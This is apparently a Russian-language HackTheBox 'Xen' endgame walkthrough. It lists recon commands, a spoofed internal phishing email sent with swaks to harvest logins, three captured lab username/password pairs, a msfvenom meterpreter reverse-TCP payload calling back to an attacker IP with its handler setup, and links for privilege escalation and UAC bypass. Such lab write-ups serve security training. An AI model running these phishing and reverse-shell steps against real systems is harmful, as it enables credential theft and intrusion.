###### tags: `HTB` # **Endgame: Xen** Есть начальная точка - адрес 10.13.38.12 Просканим нмапом, посмотрим что есть: `sudo nmap -sV -p - -sT 10.13.38.12`  Переберем директории: `gobuster dir -u https://humongousretail.com/ -k -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` Уточним какие есть пользователи на почтовом сервере: `smtp-user-enum -M RCPT -U /usr/share/dnsrecon/namelist.txt -D humongousretail.com -t 10.13.38.12`  Есть пользователи, нам необходимо перенаправить их авторизацию на наш атакующий сервер, для этого поднимаем nginx с конфигом, в котором указываем адрес сайта жертвы: `nano /etc/nginx/sites-enabled/default`  Обязательно добавить адрес сайта в etc/hosts ``` cat /home/kali/sort/csr7/body.txt Please http://10.10.14.5/remote/auth/login.aspx ``` Отправляем фишинговый фейковый запрос на авторизацию: > swaks --to sales@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body body.txt Смотрим, что пришло в вайршарке - пароли!  awardel @M3m3ntoM0ri@ jmendes VivaBARC3L0N@!!! pmorgan Summer1Summer! Логинимся по этому адресу с любых из учетных записей выше http://humongousretail.com/remote/site/default.aspx Ставим icaclient, логинимся на машину, прокидываем сессию метепретера далее msfvenom делаем reverse tcp полезную нагрузку, получаем сессию meterpreter msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.8 -f exe > payload.exe _____ msfconsole: use exploit/multi/handler set lhost tun0 set payload windows/x64/meterpeter/reverse_tcp Повышаем привелегии через https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1 Обходим UAC через: https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html